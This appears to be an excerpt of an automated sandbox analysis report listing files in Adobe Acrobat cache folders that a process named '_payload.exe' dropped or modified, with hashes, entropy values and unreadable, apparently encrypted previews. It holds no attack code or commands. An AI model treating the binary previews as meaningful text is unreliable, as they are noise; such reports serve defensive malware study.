                                                                                                                          Reputation:low
                                                                                                                          Preview:2023/$...hS(x...;..._T..n`....A..x!...bSQ...(... 3c10.<.z....)Su.G..,.vVj.F"D.TS@]O......y........7.G..ACDSM.\.%.......A....#_Up^k.....ja.........%.M.K].[...p....^...3...7...b?9..b..d?$.....r....}..y.p.bk6./..Q..}#.L..Xq....$.V.s..:L..'.......)....7..?y......{.....h..j,<....f.SI.........B...s:c..l...Tm..r..&D..Q.`Rw.S+Bb.+..}1.`...r.w.?s..q..S.$Z.S7....f)x.q........)...P...o..P.GD.y.....).....|...`..U.........?l..$.a~....-.9........?.....Q..H.^|.....].......m....-.i...o...A.b...UF..Cl..<1e......9...;..........c...^<7.....U..x..s.N!2..."..D..L........c....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):670
                                                                                                                          Entropy (8bit):7.650292250340842
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:k/GhFDNR4N+Zr+rtoCyjgP3d1heqFq52mN9264kF1cL3F6q5bTcii9a:WG7jdCrOcdeqFbm0kF1cjF/bD
                                                                                                                          MD5:BE2021B4010F5C28BFDD49E7F161ADCB
                                                                                                                          SHA1:333F5EDDB55E0856F997ABA223DE298F1977C98C
                                                                                                                          SHA-256:61AE516FD3C33AD2FFA6BC23DCA4C9D01FBADD03B3DA7688586F88BC7C1EB89C
                                                                                                                          SHA-512:1A370314343E7086A1450A122D8095F82B71B1BCE44BEE231818AD227BCCF77529E50127B1D1B9B02D2D08DC1E7EDBFF217F7F8889E50ED17BB53CF86CC9EDF9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:2023/$...hS(x...;..._T..n`....A..x!...bSQ...(... 3c10.<.z....)Su.G..,.vVj.F"D.TS@]O......y........7.G..ACDSM.\.%.......A....#_Up^k.....ja.........%.M.K].[...p....^...3...7...b?9..b..d?$.....r....}..y.p.bk6./..Q..}#.L..Xq....$.V.s..:L..'.......)....7..?y......{.....h..j,<....f.SI.........B...s:c..l...Tm..r..&D..Q.`Rw.S+Bb.+..}1.`...r.w.?s..q..S.$Z.S7....f)x.q........)...P...o..P.GD.y.....).....|...`..U.........?l..$.a~....-.9........?.....Q..H.^|.....].......m....-.i...o...A.b...UF..Cl..<1e......9...;..........c...^<7.....U..x..s.N!2..."..D..L........c....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):818
                                                                                                                          Entropy (8bit):7.727530910454046
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YKWQ1D9qNJNXGkaVOwH3WervgtBNE9TbD:Ye1D8UdooSU9HD
                                                                                                                          MD5:89088D876F6981B534D55E7085DC9987
                                                                                                                          SHA1:C894415106E69CB1FB39E72EBC2F7AFACF9CA646
                                                                                                                          SHA-256:5BA281ED4E219CBA6389CD1CDF6B0E759799F21B67FDDA2C061906AD2E68271D
                                                                                                                          SHA-512:E3ABA14A3FE6EC5CCC7E70C94949E0DC1C44DF976008C485E9EB2FFC932C8ABE11BE66865CE3E5EC7AC78D58D69751DA82100042BC212FFD2416FF39BC95B277
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"os_.W.SQ.......B.C".Js3'....@...r/4#&F../eAp./...l....A5.....D.....(t.z.....y....V..M...y..E...Q.O..W...l..v..(...S....~.W..D.k....e..W.-.K.{.q.T?...]..#cp.[.9...'....J.mQ..Y....6.#.Ho...3.d.:G.h.$...*.R.8..&.....{.;.XG.0j$......U......zD_...;.+....oE.t."Ac}.......*2.....E)..xr8B].........H...`#.;z...|.h.%.+...)...s2....-{.,....UjG.58POJ....u..............@...U,f-......p$.....y.%.^Sv...iV=Y.3..U....,#..S\[...YL..,.K..5Q..;[..%.pG-.7'.Zp......on^.......w.L.t.M...j...OGJ?Y.`..iz.2.]...>.*..va....C...N./..*+.*...4.X.....O..5wK(........tpjz`....m......w..}..s...u+.ub.MS[z"........0.e5d......~.........M.[......z...b...\.v...>.Dum4...v..9V.....A.S....~m.Y...x.1.8.D.a.l...*...e...P..'....,;aD=......Qo}phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):818
                                                                                                                          Entropy (8bit):7.727530910454046
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YKWQ1D9qNJNXGkaVOwH3WervgtBNE9TbD:Ye1D8UdooSU9HD
                                                                                                                          MD5:89088D876F6981B534D55E7085DC9987
                                                                                                                          SHA1:C894415106E69CB1FB39E72EBC2F7AFACF9CA646
                                                                                                                          SHA-256:5BA281ED4E219CBA6389CD1CDF6B0E759799F21B67FDDA2C061906AD2E68271D
                                                                                                                          SHA-512:E3ABA14A3FE6EC5CCC7E70C94949E0DC1C44DF976008C485E9EB2FFC932C8ABE11BE66865CE3E5EC7AC78D58D69751DA82100042BC212FFD2416FF39BC95B277
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"os_.W.SQ.......B.C".Js3'....@...r/4#&F../eAp./...l....A5.....D.....(t.z.....y....V..M...y..E...Q.O..W...l..v..(...S....~.W..D.k....e..W.-.K.{.q.T?...]..#cp.[.9...'....J.mQ..Y....6.#.Ho...3.d.:G.h.$...*.R.8..&.....{.;.XG.0j$......U......zD_...;.+....oE.t."Ac}.......*2.....E)..xr8B].........H...`#.;z...|.h.%.+...)...s2....-{.,....UjG.58POJ....u..............@...U,f-......p$.....y.%.^Sv...iV=Y.3..U....,#..S\[...YL..,.K..5Q..;[..%.pG-.7'.Zp......on^.......w.L.t.M...j...OGJ?Y.`..iz.2.]...>.*..va....C...N./..*+.*...4.X.....O..5wK(........tpjz`....m......w..}..s...u+.ub.MS[z"........0.e5d......~.........M.[......z...b...\.v...>.Dum4...v..9V.....A.S....~m.Y...x.1.8.D.a.l...*...e...P..'....,;aD=......Qo}phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4168
                                                                                                                          Entropy (8bit):7.953060400122653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:zzVHFD82kpc7BMrKHsYqJjObtTeazWmkpvGhg/kDjeq7dCA4I2cjjTW:tlD82kWUKMpJjObtTmvvGaKp+I2yjTW
                                                                                                                          MD5:E3B2B96312D90B8CBEE0527322AFA320
                                                                                                                          SHA1:402612655D9CE87DE645064E56F96C453620CDD3
                                                                                                                          SHA-256:4F9BA5DA0591E47FA70F0A41472CBEA681863DC4E6EB233BEDBCF6D8503006BD
                                                                                                                          SHA-512:4BADACBA7AC568841A8FE9C8C346CA2E5AC9F4F63480D4C2CF49088D6A3DC059EA607D63024B7283DDFA568DA7D6B244E825AFF5CEC5F5DF2B3A0659BCDA000B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:*...#...L.q..=i.b...I.T.....hK..5.,..D%.....@....D.....1.Um..~R....\K..1...s..g.hC....S.....z.........S....}x....v..<..zjD["NT.......M.....Y..0-...{_B=P..h".....nY..yb......?...f.:.zm..L.._....n%...@.:...e.L......w...c.i......i...T.....0y.jKK.S.+.....q.....B.&.g...,...m<..sK{.U.(.oD5.(..{.j..v....U.l.M.7.:)h..HY %zN.n %....0yb.[.<klm.i.H.(;~?.`m....G.."..mG0+|.(:..&....(..1e.....JY..1........6.W.<...........s..M....).K..K=z/..e.S......'.{]..b......-...._6g..q.t...J.$z3.L...............G.>....-.;....\..........A..0...<...sy3...CV.DJt(O.....".N:;.o....`.o...Y7......G#..-.w.Y...=#.^.w.~..P.@,.X.,......?{..G6]..)........H0....r..+...l.x..A..2...B..G.^...-'....0....b..n...g.p].`r..+.......&..%~....-$..,...#...K\....<.54C..wE.&..j.[;T.Oe..+9...l...+b+.0.|zj_.i...3.........nI.3.b.@?..o....Z....\E.\V.!..n..o..4.BXf..~;n...g.....c.D..g....G~..p1''r..ta.I......L.V......NYy.#........^)....?v...h...w....',...^...O..A..p....9^..f..O.....

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4168
                                                                                                                          Entropy (8bit):7.953060400122653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:zzVHFD82kpc7BMrKHsYqJjObtTeazWmkpvGhg/kDjeq7dCA4I2cjjTW:tlD82kWUKMpJjObtTmvvGaKp+I2yjTW
                                                                                                                          MD5:E3B2B96312D90B8CBEE0527322AFA320
                                                                                                                          SHA1:402612655D9CE87DE645064E56F96C453620CDD3
                                                                                                                          SHA-256:4F9BA5DA0591E47FA70F0A41472CBEA681863DC4E6EB233BEDBCF6D8503006BD
                                                                                                                          SHA-512:4BADACBA7AC568841A8FE9C8C346CA2E5AC9F4F63480D4C2CF49088D6A3DC059EA607D63024B7283DDFA568DA7D6B244E825AFF5CEC5F5DF2B3A0659BCDA000B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:*...#...L.q..=i.b...I.T.....hK..5.,..D%.....@....D.....1.Um..~R....\K..1...s..g.hC....S.....z.........S....}x....v..<..zjD["NT.......M.....Y..0-...{_B=P..h".....nY..yb......?...f.:.zm..L.._....n%...@.:...e.L......w...c.i......i...T.....0y.jKK.S.+.....q.....B.&.g...,...m<..sK{.U.(.oD5.(..{.j..v....U.l.M.7.:)h..HY %zN.n %....0yb.[.<klm.i.H.(;~?.`m....G.."..mG0+|.(:..&....(..1e.....JY..1........6.W.<...........s..M....).K..K=z/..e.S......'.{]..b......-...._6g..q.t...J.$z3.L...............G.>....-.;....\..........A..0...<...sy3...CV.DJt(O.....".N:;.o....`.o...Y7......G#..-.w.Y...=#.^.w.~..P.@,.X.,......?{..G6]..)........H0....r..+...l.x..A..2...B..G.^...-'....0....b..n...g.p].`r..+.......&..%~....-$..,...#...K\....<.54C..wE.&..j.[;T.Oe..+9...l...+b+.0.|zj_.i...3.........nI.3.b.@?..o....Z....\E.\V.!..n..o..4.BXf..~;n...g.....c.D..g....G~..p1''r..ta.I......L.V......NYy.#........^)....?v...h...w....',...^...O..A..p....9^..f..O.....

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):658
                                                                                                                          Entropy (8bit):7.687192035071529
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:koJgkkgbZEFNqCYClq1pX0KlaL47JY/m+JAJ673idUM2uYhevtCbfkRuXqaBEuJe:xJUO6FJADU/m+OJ6mWBuY2I/v+cMbD
                                                                                                                          MD5:F411BD776000583B2A8CA4D68C736796
                                                                                                                          SHA1:8BB57A22B7A895EAADACF8828AF92B478094ECC3
                                                                                                                          SHA-256:0D09914A043B506A02206A4FCF0D445C84F7870086CBAF18A9807C7A065FFCA9
                                                                                                                          SHA-512:D38C4C64B0FEDEB8CFF5E2D99FFA76AF2849AFEA2BD02784B8034D3365F7BAD0D97623CD1FA09E1E2E49F17653CD52975C08D99B8A3707A13CAB76ACEEF8B5EE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:2023/% Ej.........!.V....#..Cmj...P1YZ.0..h.x.E.7k...z^.JkvG.`%q...G-..]..... ..@......!...<wf*1./.....T.N+M.<..Qu:..Yz,h4@i./J...........).a.)....j.n..\](B..|.q....h.o.......D{...<...T..@.y...$....;.P...1....P....D.G.....UX]....:5.g.+".....|2.|..QK...(.....tL..k.b..6..f.......x)...M.wT^.Y...8v.o...........[o...d.s......Cr9.rS.K.......y]..c.i.v....|.Vf......q..>.....D..p....]...'._5...n.........t..M....*..C.....uL!.P"..O.#....N..ps.=.,.....~.6..%c.$. ...w{Kk0.;...2.......)).0=./~.#W.e.6....2?5....S...D.E.K.^.&....\...._..6..AY...........$...IjphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):658
                                                                                                                          Entropy (8bit):7.687192035071529
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:koJgkkgbZEFNqCYClq1pX0KlaL47JY/m+JAJ673idUM2uYhevtCbfkRuXqaBEuJe:xJUO6FJADU/m+OJ6mWBuY2I/v+cMbD
                                                                                                                          MD5:F411BD776000583B2A8CA4D68C736796
                                                                                                                          SHA1:8BB57A22B7A895EAADACF8828AF92B478094ECC3
                                                                                                                          SHA-256:0D09914A043B506A02206A4FCF0D445C84F7870086CBAF18A9807C7A065FFCA9
                                                                                                                          SHA-512:D38C4C64B0FEDEB8CFF5E2D99FFA76AF2849AFEA2BD02784B8034D3365F7BAD0D97623CD1FA09E1E2E49F17653CD52975C08D99B8A3707A13CAB76ACEEF8B5EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/% Ej.........!.V....#..Cmj...P1YZ.0..h.x.E.7k...z^.JkvG.`%q...G-..]..... ..@......!...<wf*1./.....T.N+M.<..Qu:..Yz,h4@i./J...........).a.)....j.n..\](B..|.q....h.o.......D{...<...T..@.y...$....;.P...1....P....D.G.....UX]....:5.g.+".....|2.|..QK...(.....tL..k.b..6..f.......x)...M.wT^.Y...8v.o...........[o...d.s......Cr9.rS.K.......y]..c.i.v....|.Vf......q..>.....D..p....]...'._5...n.........t..M....*..C.....uL!.P"..O.#....N..ps.=.,.....~.6..%c.$. ...w{Kk0.;...2.......)).0=./~.#W.e.6....2?5....S...D.E.K.^.&....\...._..6..AY...........$...IjphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):440
                                                                                                                          Entropy (8bit):7.451606576534451
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:r86fxXX30MIPlYfPeYvWo+Kb6ipo260tfrq5bTcii9a:IaZX3U0eYvWolb5pb60VebD
                                                                                                                          MD5:F58C92EC5FC4185AB3355808DF8E614E
                                                                                                                          SHA1:E2FD2DA0D00421DE9DEC0C260D3D9F6EFD402781
                                                                                                                          SHA-256:A81944184ACF767561E316E28B3BA8F7F1FCA5929313EF356DAA4C96B3185C62
                                                                                                                          SHA-512:6ECD5885E64D39859711EF4C0A31BB8B41101D6321613E2D1D014A5797869279134BF6FE2633B2EDBE75ED4D02D33AFF865922ADA8891BBDFA219C7F5C7AF0B3
                                                                                                                          Malicious:false
                                                                                                                          Preview:S.z1..n.K......!.(....]Y....-.R.\.O}.=z........l...?.....P...vA).5d.....L/...H...K-m.3..z....z......&.....i^}...st...y$x.,3...P..U.%..6.*%.}.]ui...&`&..0.w....:.O-^.\o.........'....L......../Z.....vl....a7`h..eEq.G.....%.^.$O".>9V."!./{..wf....6..sH..;RUC.W)`.k...+.X..:/.E...r..W,iH.D....{.t.... ....f...%4.;eh.....Z../O.@.....\.g1....>F......t....wphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):440
                                                                                                                          Entropy (8bit):7.451606576534451
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:r86fxXX30MIPlYfPeYvWo+Kb6ipo260tfrq5bTcii9a:IaZX3U0eYvWolb5pb60VebD
                                                                                                                          MD5:F58C92EC5FC4185AB3355808DF8E614E
                                                                                                                          SHA1:E2FD2DA0D00421DE9DEC0C260D3D9F6EFD402781
                                                                                                                          SHA-256:A81944184ACF767561E316E28B3BA8F7F1FCA5929313EF356DAA4C96B3185C62
                                                                                                                          SHA-512:6ECD5885E64D39859711EF4C0A31BB8B41101D6321613E2D1D014A5797869279134BF6FE2633B2EDBE75ED4D02D33AFF865922ADA8891BBDFA219C7F5C7AF0B3
                                                                                                                          Malicious:false
                                                                                                                          Preview:S.z1..n.K......!.(....]Y....-.R.\.O}.=z........l...?.....P...vA).5d.....L/...H...K-m.3..z....z......&.....i^}...st...y$x.,3...P..U.%..6.*%.}.]ui...&`&..0.w....:.O-^.\o.........'....L......../Z.....vl....a7`h..eEq.G.....%.^.$O".>9V."!./{..wf....6..sH..;RUC.W)`.k...+.X..:/.E...r..W,iH.D....{.t.... ....f...%4.;eh.....Z../O.@.....\.g1....>F......t....wphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):617
                                                                                                                          Entropy (8bit):7.5438671962898285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:kcKgKZiGwYhLe05QhN15n3APs70GXr16H1Deot0VwpPT7GI3GM1ceq5bTcii9a:4HiGFhV5Qz15n3ks7YVDebwpPTHGWcDX
                                                                                                                          MD5:CC3737778FCC9D2C37ED1F4518D3A497
                                                                                                                          SHA1:29F4D3346DBEB4ED776558DB0A5B7BC2BE77C6F7
                                                                                                                          SHA-256:8814BABBF3BEA61B1C96E9524E1CB9A6C1844107869576742911FD37C2B87E6E
                                                                                                                          SHA-512:E4F6D94002C124167FBD41D8B042D5B502F998B87049338FA73A2094181033E0FB5208950A4F371B5E5EA6D3858B9C4D7538CA8780B5EA1058C28511F4AAA4F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/..Eo..2..~e<UR&.9..E..;.v.B"..\.Zoo..p..jR.......nZ,..!..x...[.'G .,:..........Lz.76.....4...K)..;=\TA.F.fL.....z.->>.B..TR..\..P..............p..tJ*/.5.4.[.6.ZX..o5.:.yon........e'k.T3...........2{..Z...I....v .p.F..Z.b}6...._.w^....^z2.......o0...v[..@,.c~I...W>5L...0\b.g.r..^..@../..g.../.1.n...FhnqV....n....m.....N.-.[..j.v....J.3..edx.WO..rg..k(..h.*..c.a....h.F..eGy.%......"u.Ov.u.8r.".9..{r.L.b.B&P..1'w.3-.i....n.3.C.}e....U.h....B....."i...)..AF.l..9.:9##[.........I...QQ.NC..gJ3%U...K.=w.....9>..Wm.,.R..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):617
                                                                                                                          Entropy (8bit):7.5438671962898285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:kcKgKZiGwYhLe05QhN15n3APs70GXr16H1Deot0VwpPT7GI3GM1ceq5bTcii9a:4HiGFhV5Qz15n3ks7YVDebwpPTHGWcDX
                                                                                                                          MD5:CC3737778FCC9D2C37ED1F4518D3A497
                                                                                                                          SHA1:29F4D3346DBEB4ED776558DB0A5B7BC2BE77C6F7
                                                                                                                          SHA-256:8814BABBF3BEA61B1C96E9524E1CB9A6C1844107869576742911FD37C2B87E6E
                                                                                                                          SHA-512:E4F6D94002C124167FBD41D8B042D5B502F998B87049338FA73A2094181033E0FB5208950A4F371B5E5EA6D3858B9C4D7538CA8780B5EA1058C28511F4AAA4F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/..Eo..2..~e<UR&.9..E..;.v.B"..\.Zoo..p..jR.......nZ,..!..x...[.'G .,:..........Lz.76.....4...K)..;=\TA.F.fL.....z.->>.B..TR..\..P..............p..tJ*/.5.4.[.6.ZX..o5.:.yon........e'k.T3...........2{..Z...I....v .p.F..Z.b}6...._.w^....^z2.......o0...v[..@,.c~I...W>5L...0\b.g.r..^..@../..g.../.1.n...FhnqV....n....m.....N.-.[..j.v....J.3..edx.WO..rg..k(..h.*..c.a....h.F..eGy.%......"u.Ov.u.8r.".9..{r.L.b.B&P..1'w.3-.i....n.3.C.}e....U.h....B....."i...)..AF.l..9.:9##[.........I...QQ.NC..gJ3%U...K.=w.....9>..Wm.,.R..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):494
                                                                                                                          Entropy (8bit):7.505023722778883
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:GPZupiaNfprJLTAa0fWMuLsSv4CyO678reVIYGd6U1q5bTcii9a:GP4piaNBr5T/bMuwID767UeIMU0bD
                                                                                                                          MD5:B3B4FA8285AAB1F011C7881D723CDDFF
                                                                                                                          SHA1:D9A9AFC892177C17E532EEB93D1A549AB59F9621
                                                                                                                          SHA-256:2B46CFA1DC544FE651D48E39E0A8B64AAD706972B89D480F9FB1096C68144CD8
                                                                                                                          SHA-512:6E75C00490DDA62EB0FFC5DBE5E6B6444CB6240F7EFEA914F34FF27BF62EA3822ACA2FB8D4208CCC9E34DDE429106B18CB384781CB1408E6CD9BF86825381EDF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.h.6....y.A...!;^........p..j.:......>[.T....R...."W(B..n....G~[{.mR...I.pG...............f.i....>..zq..:D{{8"P..R.....C.m.....9{...K...d@..qp..."i...v...H..@.?.f.v.!v.~...>=./.G&.Y.jR#..3..C.>..)/^.3...En.Xe.!.:.K..D.*.z.....xxt.?....u.....Up....+.._Mv..KA...].n....{).2.}..p....IW.8...-..W....}7..f{.zv.......2.. h.c.q.0tN.,j.......o......)S.G.... .x).r.~).&d...)..F...u.l.._.b....$-2~.@phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):494
                                                                                                                          Entropy (8bit):7.505023722778883
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:GPZupiaNfprJLTAa0fWMuLsSv4CyO678reVIYGd6U1q5bTcii9a:GP4piaNBr5T/bMuwID767UeIMU0bD
                                                                                                                          MD5:B3B4FA8285AAB1F011C7881D723CDDFF
                                                                                                                          SHA1:D9A9AFC892177C17E532EEB93D1A549AB59F9621
                                                                                                                          SHA-256:2B46CFA1DC544FE651D48E39E0A8B64AAD706972B89D480F9FB1096C68144CD8
                                                                                                                          SHA-512:6E75C00490DDA62EB0FFC5DBE5E6B6444CB6240F7EFEA914F34FF27BF62EA3822ACA2FB8D4208CCC9E34DDE429106B18CB384781CB1408E6CD9BF86825381EDF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.h.6....y.A...!;^........p..j.:......>[.T....R...."W(B..n....G~[{.mR...I.pG...............f.i....>..zq..:D{{8"P..R.....C.m.....9{...K...d@..qp..."i...v...H..@.?.f.v.!v.~...>=./.G&.Y.jR#..3..C.>..)/^.3...En.Xe.!.:.K..D.*.z.....xxt.?....u.....Up....+.._Mv..KA...].n....{).2.}..p....IW.8...-..W....}7..f{.zv.......2.. h.c.q.0tN.,j.......o......)S.G.... .x).r.~).&d...)..F...u.l.._.b....$-2~.@phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):635
                                                                                                                          Entropy (8bit):7.637877464077059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:k1AVBV0coCXdckAkrrYvzbubIlx0hW7qjcO4HL+Ca5w3nLq5bTcii9a:W4BVXf+t3ubqxEWuDw+Cau+bD
                                                                                                                          MD5:E223DD9A2AAF5069F05F1C90CEDF2F64
                                                                                                                          SHA1:AA66840B9C9B3292FFEA136C9063D350036CF302
                                                                                                                          SHA-256:55685FB3423C19BC9936350C5B99BFFD428E929CD39815AB20FB8FF1145B1AB3
                                                                                                                          SHA-512:E4E344F57BBDBA018FE00000FDA7E77241CEC7CA6B3E65EAA6453B57761381A188ED700D02241364C08871BF07B3254A609133856DE8DB2D3D78769C1A3A34F0
                                                                                                                          Malicious:false
